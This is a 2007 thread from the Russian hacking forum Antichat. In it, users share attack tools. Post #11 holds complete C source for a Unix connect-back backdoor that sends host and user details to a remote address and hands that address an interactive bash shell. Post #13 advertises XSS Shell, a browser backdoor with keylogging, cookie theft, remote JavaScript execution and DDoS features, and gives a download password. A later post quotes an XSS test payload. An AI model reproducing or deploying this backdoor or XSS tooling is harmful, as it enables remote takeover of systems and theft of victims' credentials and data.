ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 10.10.2007, 18:45
Аватар для Fugitif
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065

Репутация: 869
По умолчанию

Simple connect-back backdoor for Unix


Код:
#include<stdio.h>
#include<string.h>
#include<stdlib.h>

#include<arpa/inet.h>
#include<netinet/in.h>
#include<sys/types.h>
#include<sys/socket.h>
#include<sys/wait.h>

#include<unistd.h>
#include<errno.h>
#include<grp.h>
#include<pwd.h>

#define SHELL "/bin/bash"
#define LEN 100
#define USR_LEN 200

void error(const char *error)
{
	if(errno != 0)
		perror(error);
	else
		printf("Error in %s\n",error);
	_exit(1);
}

/* sending information to connected host  */
void send_information_to_user(int sockfd)
{
	struct passwd *pw;
	struct group *gr;
	uid_t uid;
	int st;
	char host[LEN];
	char domain[LEN];
	char user_information[USR_LEN];
	char grp_information[USR_LEN];
	char me[] = "\t\tH00lyShit \t Backd00r\n\n\t\t By St0rM-MaN (Programming-fr34ks.net)\n";
	
	if((st = gethostname(host , LEN)) == -1)
		error("[!]Getting Host_Name");
	if((st = getdomainname(domain , LEN)) == -1)
		error("[!]Getting Domain Name");
	
	strcat(host , "\n");
	strcat(domain , "\n");

	uid = getuid();
	
	if((pw = getpwuid(uid)) == NULL)
		error("[!]Grabbing User Information");
	if((gr = getgrgid(pw->pw_gid)) == NULL)
		error("[!]Grabbing Group Information");
	sprintf(user_information , "\t\tUser (%s) uid(%d) shell(%s) home(%s)\n",
								pw->pw_name , pw->pw_uid , pw->pw_shell , pw->pw_dir);
	sprintf(grp_information ,  "\t\tGroup (%s) ,gid (%d)\n",gr->gr_name , gr->gr_gid);
	
	if((st = send(sockfd , me , strlen(me) , 0)) < 0)
		error("[!]Sending Information");
	sleep(1);
	if((st = send(sockfd ,host , strlen(host) , 0 )) < 0)
		error("[!]Sending Information");
	sleep(1);
	if((st = send(sockfd , domain , strlen(domain) , 0)) < 0)
		error("[!]Sending Information");
	sleep(1);
	if((st = send(sockfd , user_information , strlen(user_information) , 0)) < 0)
		error("[!]Sending Information");
	sleep(1);
	if((st = send(sockfd , grp_information , strlen(grp_information) , 0)) < 0)
		error("[!]Sending Information");
}	
int main(int argc , char *argv[])
{
	int z , st;
	int sockfd;
	int sock_len;
	pid_t bind_sh;


	struct sockaddr_in att;

	if(argc < 3)
	{
		printf("usage %s ip_number port_number\n",argv[0]);
		_exit(0);
	}
	printf("[+]Forming Address\n");
	att.sin_family = AF_INET ;
	att.sin_port = htons(atoi(argv[2]));
	z = inet_aton(argv[1] , &att.sin_addr);
	sock_len = sizeof(att);
	
	if(z == 0)
		error("[!]Host_IP Invaild\n");
	
	printf("[+]Creating Socket\n");
	sockfd = socket(PF_INET , SOCK_STREAM , 0);
	if(sockfd < 0)
		error("[!]Creating Socket Faild");


	bind_sh = fork();
	
	if(bind_sh == -1)
	{
		error("Cannot Open New Process");
	}else if (bind_sh == 0)
	{
		printf("[+]Binding Shell\n");
		printf("[+]Connecting\n");
		printf("[+]Sending_User Infromation\n");
		z = connect(sockfd , (struct sockaddr*)&att , sock_len);
		if(z == -1)
			error("[!]Connection error");
		
		send_information_to_user(sockfd);
		
		
		if((dup2(sockfd , 0) == -1) ||
				  (dup2(sockfd , 1) == -1) ||
				  (dup2(sockfd , 3) == -1));

		execl(SHELL , SHELL , NULL);
	}else
	{
		wait(&st); /* kinda useless but safe */
	}

	printf("Done\n");
	return 0;
}

Код:
http://www.packetstormsecurity.org/UNIX/penetration/rootkits/rcbd.c
 
Ответить с цитированием

  #12  
Старый 11.10.2007, 18:56
Аватар для z01b
z01b
Постоянный
Регистрация: 05.01.2007
Сообщений: 508
Провел на форуме:
2360904

Репутация: 1393


По умолчанию

Цитата:
Simple connect-back backdoor for Unix
В сабж, написано на Php

Последний раз редактировалось z01b; 11.10.2007 в 20:06..
 
Ответить с цитированием

  #13  
Старый 12.10.2007, 11:50
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

XSS Shell v.0.3.9[ASP]
Цитата:
XSS Shell is a powerful XSS backdoor which allows interactively getting control over a Cross-site Scripting (XSS) vulnerability in a web application. Demonstrates the real power and damage of Cross-site Scripting attacks.

WHAT IS XSS SHELL ?

XSS Shell is powerful a XSS backdoor and zombie manager. This concept first presented by XSS-Proxy (http://xss-proxy.sourceforge.net/). Normally in XSS attacks attacker has one shot, in XSS Shell you can interactively send requests and get responses from victim, you can backdoor the page.

You can steal basic auth, you can bypass IP restrictions in administration panels, you can DDoS some systems with a permanent XSS vulnerability etc. Attack possibilities are limited with ideas. Basically this tool demonstrates that you can do more with XSS.

FEATURES

XSS Shell has several features to gain whole access over victim. Also you can simply add your own commands.

Most of the features can enable or disabled from configuration or can be tweaked from source code.

Features:

* Regenerating Pages
* Keylogger
* Mouse Logger (click points + current DOM)

Built-in Commands:

* Get Keylogger Data
* Get Current Page (Current rendered DOM / like screenshot)
* Get Cookie
* Execute supplied javaScript (eval)
* Get Clipboard (IE only)
* Get internal IP address (Firefox + JVM only)
* Check victimr17;s visited URL history
* DDoS
* Force to Crash victimr17;s browser
Download
Пароль на архив: shgf76S*G - [xeka.ru]
 
Ответить с цитированием

  #14  
Старый 13.10.2007, 13:54
Аватар для ZET36
ZET36
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748

Репутация: 137
По умолчанию

извените меня за тупость но что этот сплоит позволяет залить шелл с помощью xss ?

Последний раз редактировалось ZET36; 13.10.2007 в 17:15..
 
Ответить с цитированием

  #15  
Старый 13.10.2007, 17:18
Аватар для ZET36
ZET36
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748

Репутация: 137
По умолчанию

и как им пользоваться? опять прошу прощение за незнания английского(учил немецкий) вот например есть хсс www.site.ru/d="><script>alert()</script>

как я понимаю наверно нужно вставить на страницу с хсс какойто скрипт из папки xssshell\js\ только какой?

и некак непонимаю каак можно залить шелл через js это ведь клиентский язык

Последний раз редактировалось ZET36; 13.10.2007 в 17:21..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
Books PSalm69 Избранное 248 27.10.2009 04:52
На PHP, как на "Новые ворота"... Mertvii-Listopad Чужие Статьи 7 18.09.2006 12:42
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ